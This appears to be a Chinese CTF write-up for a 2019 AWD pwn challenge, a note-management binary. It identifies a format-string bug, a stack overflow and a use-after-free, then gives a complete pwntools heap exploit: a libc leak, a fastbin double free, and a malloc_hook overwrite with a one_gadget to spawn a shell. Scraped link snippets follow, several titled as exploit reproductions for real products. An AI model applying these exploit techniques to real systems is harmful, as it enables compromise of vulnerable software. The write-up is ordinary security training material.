Jc^
Jc^

2019中原工pwn题

checksec机制和file信息

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

./pwn: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, 
for GNU/Linux 2.6.32, BuildID[sha1]=27c2b18fe2e670a93eb2e587d92df77ed62d5d99, not stripped

这次比赛是线下awd赛事,所以libc版本是知道的(ubuntu16.04)

运行

Welcom to Note system!
Please input your name:aaaa
Hello aaaa
Please input your password:bbbb

Note system
1. create a note
2. write note
3. free the note
4. show the note
5. exit
choice:

简单分析

安全机制[+]---->大部分的机制全部开启了
运 行[+]---->可以看出来里面结合了堆溢出,在开始输入用户名的密码的地方是否存在栈溢出等漏洞需要结合IDA查看

IDA分析

  char format; // [rsp+0h] [rbp-30h]
  char buf; // [rsp+10h] [rbp-20h]
  unsigned __int64 v3; // [rsp+28h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  puts("Welcom to Note system!");
  printf("Please input your name:");
  __isoc99_scanf("%s", &format);
  printf("Hello ", &format);
  printf(&format);    #存在格式化字符串漏洞
  printf("\nPlease input your password:");
  read(0, &buf, 0x40uLL);   #存在栈溢出,buf明显小于0x40
  return __readfsqword(0x28u) ^ v3;

利用格式化字符串泄露canary和内置函数(为了泄露libc_base),这里需要注意的是buf的大小,需要考虑栈旋转。

	free函数
  printf("index: ");
  v0 = getchoice(v2);
  v3 = v0;
  if ( v0 >= 0LL && v0 <= 15LL )
  {
    v3 = *(&a + 4 * v0);
    free(*(&a + 2 * v0 + 1));                   // uaf
  }
  return v3;

利用堆里存在uaf漏洞(泄露libc_base),然后利用double free伪造chunk 然后修改malloc_hook或者free_hook

EXP(堆)

from pwn import*
context.log_level = 'debug'

p = process("./pwn")

def add(size):
	p.sendlineafter("choice: ",str(1))
	p.sendlineafter("size: ",str(size))
def write(index,content):
	p.sendlineafter("choice: ",str(2))
	p.sendlineafter("index: ",str(index))
	p.sendlineafter("content: ",content)
def free(index):
	p.sendlineafter("choice: ",str(3))
	p.sendlineafter("index: ",str(index))
def show(index):
   	p.sendlineafter("choice: ",str(4))
   	p.sendlineafter("index: ",str(index))


p.recvuntil("Please input your name:")
p.sendline("aaaa")
p.recvuntil("your password:")
p.sendline("bbbb")

print "===== leak libc_base"
add(0x80) #0
add(0x20)  #1
free(0)
show(0)
p.recvuntil("content: ")
main_arena = u64(p.recv(6).ljust(8,"\x00"))
libc_base = main_arena -0x58 -0x3c4b20
print ("[+]----->main_arena = ") + hex(main_arena)
print ("[+]----->libc_base = ") + hex(libc_base)

print "===== fake chunk ====="
fake_chunk = main_arena - 0x58 -0x33
one_gadget = libc_base + 0xf1147
print ("[+]-----> fake_chunk =") +hex(fake_chunk)
add(0x80) #2
add(0x60) #3
add(0x60) #4
free(3)
free(4)
free(3)
#attach(p)

add(0x60) # new 3
write(3,p64(fake_chunk)+"a"*(0x60-8))

add(0x60) # new 4
add(0x60) # new 3
add(0x60) # fake_chunk 5

print "===== get shell ====="
write(8,"a"*0x13 + p64(one_gadget)+"b"*(0x60-0x13-0x8))
add(0x20)
p.interactive()

你可能感兴趣的:(赛事复现)

  • Table列表复现框实现【勾选-搜索-再勾选】 ~四时春~ java开发语言elementuivue
    Table列表复现框实现【勾选-搜索-再勾选】概要整体架构流程代码实现技术细节注意参考文献概要最近在开发时遇到一个问题,在进行表单渲染时,正常选中没有问题,单如果需要搜索选中时,一个是已选中的不会回填,二是在搜索的结果中进行选中,没有实现,经过排查,查找资料后实现。例如:整体架构流程具体的实现效果如下:代码实现{{scope.row.userName}}已选区{{userItem.userName
  • discuz discuz_admincp.php 讲解,Discuz! 1.5-2.5 命令执行漏洞分析(CVE-2018-14729) weixin_39740419 discuz讲解
    0x00漏洞简述漏洞信息8月27号有人在GitHub上公布了有关Discuz1.5-2.5版本中后台数据库备份功能存在的命令执行漏洞的细节。漏洞影响版本Discuz!1.5-2.50x01漏洞复现官方论坛下载相应版本就好。0x02漏洞分析需要注意的是这个漏洞其实是需要登录后台的,并且能有数据库备份权限,所以比较鸡肋。我这边是用Discuz!2.5完成漏洞复现的,并用此进行漏洞分析的。漏洞点在:so
  • 【漏洞复现】2023HVV WPS Office 远程代码执行漏洞(RCE) 李火火安全阁 漏洞复现应用安全WPSOffice
    文章目录前言声明一、漏洞描述二、影响范围三、漏洞复现服务端的功能客户端的功能四、修复建议前言2023HVV期间曝出的WPSOffice存在RCE漏洞,攻击者可通过该漏洞执行任意命令,获取服务器控制权限。声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
  • aspcms webshell漏洞复现 青衫木牛马 aspaspcmsgetshell
    1.【ip】/admin_aspcms/login.asp访问后台,admin123456登录2.点击【扩展功能】【幻灯片设置】点击【保存】开启代理进行抓包3.在抓取的数据包中修改slideTextStatus字段的值为以下代码并进行发包访问影响文件字段值1%25><%25密码是a影响文件/config/AspCms_Config.asp4.蚁剑连接
  • 周二竞足:塞维利亚力争小胜巴萨,亚特兰大击败热那亚如探囊取物 阿东侃球
    昨日赛事回顾:富勒姆对阵谢菲尔德联这场很简单,整体方向是正确的,但是谢菲联在开局3分钟进了1个球后,富勒姆竟然没能追平,全场就只有这1个进球,有点可惜。莱万特和巴伦西亚这一场比赛简直就是折磨人,上半场莱万特2-1领先,下半场却被反攻最终3-4结束,硬生生的打出了胜负的战果,着实惊到了我。周二003意甲:热那亚VS亚特兰大比赛时间:2021-12-2203:45基本面分析:热那亚联赛1胜7平10负积
  • 当姨妈遇见马拉松赛事,该怎么破 语非年
    图片发自App凌晨4:30分匆匆洗漱出门,到5:10分集合点与团长、许总车自驾前往参赛地(漳州市华安县),车上听说参赛点大雨倾盆,本来就有心无意参赛的(没雨就跑,有雨弃赛),果不其然在进入华安县的时候就遇瓢泼大雨,于是与如风大神们说笑着,若到起跑点还是这般大雨就弃赛。因都身体抱恙。所幸,天工不负有心人,到达目的地存包直到开跑,雨奇迹般的停了。临近比赛的前三天正好生理期,在纠结去还是不去的时候,内心
  • GIN日志和日志格式 一叶知秋@qqy GO技术预研
    前言感谢开源项目gin-vue-admin,以及1010工作室的教程,项目文档我只是在跟着学习,然后记录下笔记而已,可能会有新的代码加入,但是本质还是跟着学习的一个过程。为什么要使用日志记录参数信息猜测用户行为复现系统bug并修复不推荐使用GIN自带的日志GIM虽然自带日志写入中间件,但是自定义比较蛮烦,而且使用起来也不能随心所欲。第三方日志工具go-logginglogrus看见go-loggi
  • 又一国足克星要来中超!曾两度攻破国足大门,在日本联赛证明自己 枫桥落夜
    众所周知,中国足球这些年下滑得十分严重,各级国足都出现了成绩危机,国青国少从此前的能够经常进入世青赛,到现在连亚青赛的正赛都无缘。国奥队输给越南,国家队更是赢不了印度、巴勒斯坦,菲律宾,甚至主场还被泰国队战胜。所以每次到了亚洲分组赛事,一看我们的小组十有八九就是死亡之组,而且哪个队里似乎都有中国队的克星,都攻破过中国队的大门,甚至绝杀过中国队。可以说中国队的克星从以前的韩国名宿、日本名宿、伊朗名宿
  • 成都大运会 创作者1777号
    成都大运会是中国举办的一项重大国际体育赛事,也是世界大学生运动会的分站赛。作为四川省省会,成都历史悠久、文化繁荣,拥有得天独厚的地理优势和丰富的旅游资源。举办大运会不仅可以展示成都的魅力,也可促进体育事业发展,提升城市形象。大运会是一个集竞技、友谊、文化于一体的体育盛会。参赛国家和地区的大学生运动员将聚集在成都,通过多项比赛展示他们的才华与实力。不仅如此,大运会还有各种文化交流活动,如开幕式、闭幕
  • 网络安全的相关比赛有哪些?需要掌握哪些必备技能? 网安学习 web安全安全网络安全的相关比赛有哪
    01、CTF(夺旗赛)这是一种最常见的网络安全竞技形式,要求参赛者在限定时间内解决一系列涉及密码学、逆向工程、漏洞利用、取证分析等领域的挑战,获取标志(flag)并提交得分。通过举办CTF来培养网络安全人才,已经发展成为了国际网络安全圈的共识。CTF赛事可以分为线上赛和线下赛,线上赛通常是解题模式(Jeopardy),线下赛通常是攻防模式(Attack-Defense)。CTF赛事的代表性线下赛事
  • 百行代码复现扩散模型-基于线性回归 李新然 数据统计分析深度学习线性回归算法回归python数据分析
    文章目录引言简化模型原本模型模型改造实现过程数据集文本编码图像编码解码扩散过程训练过程生成过程完整实现结论引言多模态的深度学习模型,通常需要大量的算力去训练和验证。这导致缺乏算力的普通读者,阅读“大模型”论文,只能按论文作者所写来构造自己的认知。可能对很多类似笔者的人来说:纸上得来终觉浅。或许我们可以退而求其次,只选择Follow论文的思路。本文以DiffusionModel为例,说明从核心思想来
  • 要成才,学习许三多;要身材,忍得住吃喝;要从容,就直面生活。 回眸秋波风尘
    最近有三类新闻占据着各种评点的主界面,那就是奥运赛事、明星生活、中美外交。无论是大众媒体的新闻头条还是茶余饭后的谈资消遣。热度很像是目前霸占荧屏的影视剧《扫黑风暴》:动人心弦、万众瞩目。比如体操,男子52公斤级的中国选手胡建关在八分之一决赛中被主办方日本拳击手田中亮明的胳膊肘和后脑勺击打,脸和头皮开了四个洞,因流血过多,被医务监督停止。比如明星,最热的就是霍尊。这个当红歌星,业内人士这样评价“仙风
  • 大众跑者跑马的经历【02】:三月的马拉松 平阳县体育总会春哥
    马拉松赛事的井喷,原因是多方面的,一与经济发展水平相关;二与城市营销的热潮相关,马拉松赛事自带流量,已成为不少城市推广城市品牌的重要抓手;三与人们追求健康的生活方式相关。全民健身成为国家战略,跑步是门槛较低的运动项目。而互联网、运动APP等平台的出现则使群众健身变得具有了社交属性,跑者们除了享受运动快乐之外,还可以通过朋友圈分享、加入跑群等,让跑步更有趣。马拉松还能够增强人体的意志力,一般来说,没
  • Android Graphics 显示系统 - VirtualDisplay的初印象 - 简单示例 向晚流年 android
    “开始准备这篇文章时巴黎奥运会赛场上激战正酣,写完时奥运已落下帷幕,期间也看了许多精彩的赛事直播,拼搏与汗水书写的传奇无不激励着平凡岗位上的我们。每一枚奖牌的背后,都凝聚着运动员数不尽的汗水付出与坚持不懈,学习AndroidGraphics显示系统的知识,也需要我们长久的坚持、不断地探索实践。一点一滴地积累,一万小时天才定律,相信你终将赢得属于自己的金牌。”前言在许多场景中都会用到Android虚
  • A类竞赛-保研-打比赛-机器人及人工智能大赛 土豆打工仔 机器人人工智能考研
    大赛简介中国机器人及人工智能大赛属于全国高校学科竞赛A类赛事,由中国人工智能学会、教育部高等学校计算机课程教学指导委员会联合主办,旨在引导和激励广大青年学生弘扬创新精神,搭建良好的科技创新赛事平台,助力人工智能、机器人产业发展,推动“人工智能+”“机器人+”新经济产业体系建设,积极推动广大学生参与机器人、人工智能科技创新实践,通过竞赛培养出一批爱创新、会动手、能协作、勇于拼搏的科技精英人才。大赛内
  • 牛客周赛 Round 58 Pown_ShanYu 算法c++开发语言
    D好好好数题目大意:定义k-好数为:可以表示为若干个不同的k的整次幂之和的数字例如30=3^3+3^1,30是一个3-好数给定一个数n,n最少可以表示成几个k-好数的和赛事错误思路:将n转化为k进制,然后将数位上的数字求和,当时想的是求n转换为n个k的整次幂的数正解:k进制数位上的最大值即为解,因为一个k-好数可以表示为多个k的整次幂的和,比如三进制下1010,可用(1000+10)两个k的整次幂
  • Nginx越界读取缓存漏洞 CVE-2017-7529 漏洞复现 ADummy_ vulhub_Writeup网络安全渗透测试安全漏洞
    Nginx越界读取缓存漏洞(CVE-2017-7529)byADummy0x00利用路线POC验证—>读取到缓存文件中位于“http返回包体”前的“文件头”、“http返回包头”等内容0x01漏洞介绍Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,
  • 【小贪】项目实战——Zero-shot根据文字提示分割出图片目标掩码 贪钱算法还我头发 #DeepLearning#ComputerVisionAI目标检测深度学习python语义分割Zero-shot
    目标描述给定RGB视频或图片,目标是分割出图像中的指定目标掩码。我们需要复现两个Zero-shot的开源项目,分别为IDEA研究院的GroundingDINO和Facebook的SAM。首先使用目标检测方法GroundingDINO,输入想检测目标的文字提示,可以获得目标的anchorbox。将上一步获得的box信息作为SAM的提示,分割出目标mask。具体效果如下(测试数据来自VolumeDef
  • 【漏洞复现】华三 H3C IMC 智能管理中心 /byod/index.xhtml RCE 凝聚力安全团队 漏洞复现xhtml前端htmlweb渗透web网络安全渗透测试
    免责声明:本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所
  • 「漏洞复现」契约锁电子签章平台 add 远程命令执行漏洞 鲨鱼辣椒丶D 漏洞复现web安全
    0x01免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!0x02产品介绍契约锁电子签章平台是上海亘岩网络科技有限公司推出的一套数字签章解决方案。契约锁为中大型组织提供“数
  • 2024年云曦网络安全实验室2024春季学期开学考复现Writeup 2301_82257383 程序员web安全android安全
    构造的payloa为http://172.16.17.201:50183/Gentle_sister.php/?my_parameter[]=1可以直接访问也可以Hackbar工具传参。通过使用my_parameter[]=1,相当于是告诉服务器,我们在传递的是一个包含1的数组而非数字或字符串,在这种情况下,$_GET[‘my_parameter’]得到的将是一个数组,而不是一个单一的值。原本脚本
  • BUUCTF 2021-10-4 Pwn Ch1lkat BUUCTFPwnlinuxpwn
    文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffe
  • 快32岁的苏炳添闪耀奥运 菲姐的简书
    我是伪奥运迷,最近打开电视基本上都是五台今天晚上就观看了苏炳添100米的那场赛事,挺感慨的首先,苏炳添这个月32岁了,这个年龄,算大的了,当然,这届奥运会还蛮多年龄偏大的运动员,他不是唯一其次,苏炳添跑出了黄色人种在这个项目的最好成绩,他应该是没有遗憾的最后,我看到了观众的理性,不再像当初对待刘翔的态度,能客观看待比赛和我们的优劣势了,毕竟,这确实不是我们的长项,虽然没有金牌,但是我们的成绩我们自
  • 160班——我们的第九十六天 凝涵
    今日诸事作结:1、发放《趣读识写一条龙》上册,叮嘱写好姓名,感兴趣的可以先翻一翻。2、复习视频《笔画歌》五次。(听录音,齐读,拍节奏读,书空读。师生一起读)3、练坐姿,复习课堂口令,握笔姿势,课堂规矩。4、开展主题班会课《开学第一课:越努力,越幸运》,结合时事,了解冬奥会,观看女足赛事、学习青少年偶像谷爱凌……课堂上孩子们眼神放光,立志要学习运动员们的团结一心、积极拼搏。5、下课捕捉到孩子们在教室
  • 《驴友的朝圣》046 冰河速滑马拉松赛,开创户外全民上冰雪篇章 经典老表
    协会在积极地为开拓本地户外运动市场而不懈努力,以实现“每年至少做1到2件大事件”的目标。但什么样的事件才算是大事件,什么样的事件才有利于户外运动呢?这年,王一夫认识到户外运动要转型并升级,他提出一个大胆的承办“冰河速滑马拉松赛”策划案,提交协会理事会讨论。如果说东北的冰天雪地时间占一年的一半时间的话,那么,我们就更应该在这冰雪世界上做文章。我们总能看到跑步的马拉松赛事,也看到汽车拉力赛、环法自行车
  • Collectors.toMap 报错 NullPointerException 赵丙双 java踩坑CollectorstoMapjavastreamNPE
    最近线上偶尔会报一个NPE,是Collectors.toMap导致的,这里小记一下,防止再次踩坑。场景:批量查询用户信息,查询结果为List,然后将其转换成Map,以供其他地方使用,但在Collectors.toMap时抛出了异常NullPointerException。复现问题publicclassToMapTest{publicstaticvoidmain(String[]args){List
  • 2023-09-09 恋空_4aed
    威廉希尔:利物浦该签下巴雷拉,能和阿诺德很好联动,比其他目标更值得期待在经历了一个令人失望的赛季后,利物浦迫切希望在下赛季恢复他们在英超和欧洲赛事中的统治地位。本赛季,红军未能在他们辉煌的历史上再添新的奖杯,甚至有可能无缘欧冠,因为积分的主动权完全不在自己的手中,这样的情况让人感到遗憾。事实上,克洛普已经表达了他的强烈意愿,希望在这个夏天引进新的球员,他们可以提高和提高球场的关键区域的质量,中场人
  • 活着,就该留下点什么 zcc5220
    翻看朋友圈,无意中看到,崂山100越野赛总监莫言的朋友圈发的一信息图片发自App这是一个关于越野赛事的故事,相信在这一天,对于所有越野的人来说都是一个震惊,也相信,这是一条足以刷爆所有越野人的朋友圈的消息,特别是参加过TNF的跑者,更能够有感触。图片发自App我是越野爱好者,但并不代表我就认识“申神”,相对于这些闻名中外的赛事,因“出道”较晚,自然很多赛事未能去一一领略和感受赛事总监的用心赛道。而
  • weblogic-SSRF漏洞复现(SSRF原理、利用与防御) 不想当脚本小子的脚本小子 中间件漏洞复现SSRF安全
    一、SSRF概念服务端请求伪造(Server-SideRequestForgery),是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片、文档等等。首先,我们要对目标网站的架构了解
  • 【Python】爬虫实战03:自动化抢票脚本【某麦网】 Ustinian_310 python自动化开发语言selenium
    1.脚本介绍1.1背景介绍在这个数字化时代,演唱会、体育赛事和各种活动的门票销售往往在线上进行。由于热门活动的高需求和门票的有限供应,抢票成为了一场激烈的竞争。许多粉丝和爱好者经常因为手速不够快或网络延迟而错失购票机会。为了提高抢票的成功率,自动化抢票脚本应运而生。以下这个脚本是一个用Python编写的自动化抢票程序,利用Selenium库来模拟用户在网页上的操作。下面是脚本的详细功能和结构介绍:
  • redis学习笔记——不仅仅是存取数据 Everyday都不同 returnSourceexpire/delincr/lpush数据库分区redis
    最近项目中用到比较多redis,感觉之前对它一直局限于get/set数据的层面。其实作为一个强大的NoSql数据库产品,如果好好利用它,会带来很多意想不到的效果。(因为我搞java,所以就从jedis的角度来补充一点东西吧。PS:不一定全,只是个人理解,不喜勿喷)   1、关于JedisPool.returnSource(Jedis jeids)   这个方法是从red
  • SQL性能优化-持续更新中。。。。。。 atongyeye oraclesql
    1 通过ROWID访问表--索引 你可以采用基于ROWID的访问方式情况,提高访问表的效率, , ROWID包含了表中记录的物理位置信息..ORACLE采用索引(INDEX)实现了数据和存放数据的物理位置(ROWID)之间的联系. 通常索引提供了快速访问ROWID的方法,因此那些基于索引列的查询就可以得到性能上的提高. 2 共享SQL语句--相同的sql放入缓存 3 选择最有效率的表
  • [JAVA语言]JAVA虚拟机对底层硬件的操控还不完善 comsci JAVA虚拟机
         如果我们用汇编语言编写一个直接读写CPU寄存器的代码段,然后利用这个代码段去控制被操作系统屏蔽的硬件资源,这对于JVM虚拟机显然是不合法的,对操作系统来讲,这样也是不合法的,但是如果是一个工程项目的确需要这样做,合同已经签了,我们又不能够这样做,怎么办呢? 那么一个精通汇编语言的那种X客,是否在这个时候就会发生某种至关重要的作用呢? &n
  • lvs- real 男人50 LVS
    #!/bin/bash # # Script to start LVS DR real server. # description: LVS DR real server # #.  /etc/rc.d/init.d/functions VIP=10.10.6.252 host='/bin/hostname' case "$1" in sta
  • 生成公钥和私钥 oloz DSA安全加密
    package com.msserver.core.util; import java.security.KeyPair; import java.security.PrivateKey; import java.security.PublicKey; import java.security.SecureRandom; public class SecurityUtil {
  • UIView 中加入的cocos2d,背景透明 374016526 cocos2dglClearColor
    要点是首先pixelFormat:kEAGLColorFormatRGBA8,必须有alpha层才能透明。然后view设置为透明glView.opaque = NO;[director setOpenGLView:glView];[self.viewController.view setBackgroundColor:[UIColor clearColor]];[self.viewControll
  • mysql常用命令 香水浓 mysql
    连接数据库 mysql -u troy -ptroy 备份表 mysqldump -u troy -ptroy mm_database mm_user_tbl > user.sql 恢复表(与恢复数据库命令相同) mysql -u troy -ptroy mm_database < user.sql 备份数据库 mysqldump -u troy -ptroy
  • 我的架构经验系列文章 - 后端架构 - 系统层面 agevs JavaScriptjquerycsshtml5
    系统层面: 高可用性 所谓高可用性也就是通过避免单独故障加上快速故障转移实现一旦某台物理服务器出现故障能实现故障快速恢复。一般来说,可以采用两种方式,如果可以做业务可以做负载均衡则通过负载均衡实现集群,然后针对每一台服务器进行监控,一旦发生故障则从集群中移除;如果业务只能有单点入口那么可以通过实现Standby机加上虚拟IP机制,实现Active机在出现故障之后虚拟IP转移到Standby的快速
  • 利用ant进行远程tomcat部署 aijuans tomcat
    在javaEE项目中,需要将工程部署到远程服务器上,如果部署的频率比较高,手动部署的方式就比较麻烦,可以利用Ant工具实现快捷的部署。这篇博文详细介绍了ant配置的步骤(http://www.cnblogs.com/GloriousOnion/archive/2012/12/18/2822817.html),但是在tomcat7以上不适用,需要修改配置,具体如下: 1.配置tomcat的用户角色
  • 获取复利总收入 baalwolf 获取
           public static void main(String args[]){         int money=200;         int year=1;         double rate=0.1; &
  • eclipse.ini解释 BigBird2012 eclipse
    大多数java开发者使用的都是eclipse,今天感兴趣去eclipse官网搜了一下eclipse.ini的配置,供大家参考,我会把关键的部分给大家用中文解释一下。还是推荐有问题不会直接搜谷歌,看官方文档,这样我们会知道问题的真面目是什么,对问题也有一个全面清晰的认识。 Overview 1、Eclipse.ini的作用 Eclipse startup is controlled by th
  • AngularJS实现分页功能 bijian1013 JavaScriptAngularJS分页
            对于大多数web应用来说显示项目列表是一种很常见的任务。通常情况下,我们的数据会比较多,无法很好地显示在单个页面中。在这种情况下,我们需要把数据以页的方式来展示,同时带有转到上一页和下一页的功能。既然在整个应用中这是一种很常见的需求,那么把这一功能抽象成一个通用的、可复用的分页(Paginator)服务是很有意义的。   &nbs
  • [Maven学习笔记三]Maven archetype bit1129 ArcheType
    archetype的英文意思是原型,Maven archetype表示创建Maven模块的模版,比如创建web项目,创建Spring项目等等.   mvn archetype提供了一种命令行交互式创建Maven项目或者模块的方式,   mvn archetype   1.在LearnMaven-ch03目录下,执行命令mvn archetype:gener
  • 【Java命令三】jps bit1129 Java命令
    jps很简单,用于显示当前运行的Java进程,也可以连接到远程服务器去查看   [hadoop@hadoop bin]$ jps -help usage: jps [-help] jps [-q] [-mlvV] [<hostid>] Definitions: <hostid>: <hostname>[:
  • ZABBIX2.2 2.4 等各版本之间的兼容性 ronin47
    zabbix更新很快,从2009年到现在已经更新多个版本,为了使用更多zabbix的新特性,随之而来的便是升级版本,zabbix版本兼容性是必须优先考虑的一点 客户端AGENT兼容 zabbix1.x到zabbix2.x的所有agent都兼容zabbix server2.4:如果你升级zabbix server,客户端是可以不做任何改变,除非你想使用agent的一些新特性。 Zabbix代理(p
  • unity 3d还是cocos2dx哪个适合游戏? brotherlamp unity自学unity教程unity视频unity资料unity
    unity 3d还是cocos2dx哪个适合游戏? 问:unity 3d还是cocos2dx哪个适合游戏? 答:首先目前来看unity视频教程因为是3d引擎,目前对2d支持并不完善,unity 3d 目前做2d普遍两种思路,一种是正交相机,3d画面2d视角,另一种是通过一些插件,动态创建mesh来绘制图形单元目前用的较多的是2d toolkit,ex2d,smooth moves,sm2,
  • 百度笔试题:一个已经排序好的很大的数组,现在给它划分成m段,每段长度不定,段长最长为k,然后段内打乱顺序,请设计一个算法对其进行重新排序 bylijinnan java算法面试百度招聘
    import java.util.Arrays; /** * 最早是在陈利人老师的微博看到这道题: * #面试题#An array with n elements which is K most sorted,就是每个element的初始位置和它最终的排序后的位置的距离不超过常数K * 设计一个排序算法。It should be faster than O(n*lgn)。
  • 获取checkbox复选框的值 chiangfai checkbox
    <title>CheckBox</title> <script type = "text/javascript"> doGetVal: function doGetVal() { //var fruitName = document.getElementById("apple").value;//根据
  • MySQLdb用户指南 chenchao051 mysqldb
    原网页被墙,放这里备用。 MySQLdb User's Guide Contents Introduction Installation _mysql MySQL C API translation MySQL C API function mapping Some _mysql examples MySQLdb
  • HIVE 窗口及分析函数 daizj hive窗口函数分析函数
    窗口函数应用场景: (1)用于分区排序 (2)动态Group By (3)Top N (4)累计计算 (5)层次查询 一、分析函数 用于等级、百分点、n分片等。 函数             说明 RANK()     &nbs
  • PHP ZipArchive 实现压缩解压Zip文件 dcj3sjt126com PHPzip
    PHP ZipArchive 是PHP自带的扩展类,可以轻松实现ZIP文件的压缩和解压,使用前首先要确保PHP ZIP 扩展已经开启,具体开启方法就不说了,不同的平台开启PHP扩增的方法网上都有,如有疑问欢迎交流。这里整理一下常用的示例供参考。 一、解压缩zip文件 01 02 03 04 05 06 07 08 09 10 11
  • 精彩英语贺词 dcj3sjt126com 英语
    I'm always here              我会一直在这里支持你                &nb
  • 基于Java注解的Spring的IoC功能 e200702084 javaspringbeanIOCOffice
                                      
  • java模拟post请求 geeksun java
    一般API接收客户端(比如网页、APP或其他应用服务)的请求,但在测试时需要模拟来自外界的请求,经探索,使用HttpComponentshttpClient可模拟Post提交请求。 此处用HttpComponents的httpclient来完成使命。 import org.apache.http.HttpEntity ; import org.apache.http.HttpRespon
  • Swift语法之 ---- ?和!区别 hongtoushizi ?swift!
    转载自: http://blog.sina.com.cn/s/blog_71715bf80102ux3v.html   Swift语言使用var定义变量,但和别的语言不同,Swift里不会自动给变量赋初始值,也就是说变量不会有默认值,所以要求使用变量之前必须要对其初始化。如果在使用变量之前不进行初始化就会报错: var stringValue : String //
  • centos7安装jdk1.7 jisonami jdkcentos
    安装JDK1.7 步骤1、解压tar包在当前目录 [root@localhost usr]#tar -xzvf jdk-7u75-linux-x64.tar.gz 步骤2:配置环境变量 在etc/profile文件下添加 export JAVA_HOME=/usr/java/jdk1.7.0_75 export CLASSPATH=/usr/java/jdk1.7.0_75/lib
  • 数据源架构模式之数据映射器 home198979 PHP架构数据映射器datamapper
    前面分别介绍了数据源架构模式之表数据入口、数据源架构模式之行和数据入口数据源架构模式之活动记录,相较于这三种数据源架构模式,数据映射器显得更加“高大上”。   一、概念 数据映射器(Data Mapper):在保持对象和数据库(以及映射器本身)彼此独立的情况下,在二者之间移动数据的一个映射器层。概念永远都是抽象的,简单的说,数据映射器就是一个负责将数据映射到对象的类数据。 &nb
  • 在Python中使用MYSQL pda158 mysqlpython
    缘由   近期在折腾一个小东西须要抓取网上的页面。然后进行解析。将结果放到 数据库中。   了解到 Python在这方面有优势,便选用之。   由于我有台 server上面安装有 mysql,自然使用之。在进行数据库的这个操作过程中遇到了不少问题,这里 记录一下,大家共勉。    python中mysql的调用    百度之后能够通过MySQLdb进行数据库操作。
  • 单例模式 hxl1988_0311 java单例设计模式单件
    package com.sosop.designpattern.singleton; /* * 单件模式:保证一个类必须只有一个实例,并提供全局的访问点 * * 所以单例模式必须有私有的构造器,没有私有构造器根本不用谈单件 * * 必须考虑到并发情况下创建了多个实例对象 * */ /** * 虽然有锁,但是只在第一次创建对象的时候加锁,并发时不会存在效率
  • 27种迹象显示你应该辞掉程序员的工作 vipshichg 工作
    1、你仍然在等待老板在2010年答应的要提拔你的暗示。 2、你的上级近10年没有开发过任何代码。 3、老板假装懂你说的这些技术,但实际上他完全不知道你在说什么。 4、你干完的项目6个月后才部署到现场服务器上。 5、时不时的,老板在检查你刚刚完成的工作时,要求按新想法重新开发。 6、而最终这个软件只有12个用户。 7、时间全浪费在办公室政治中,而不是用在开发好的软件上。 8、部署前5分钟才开始测试。
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他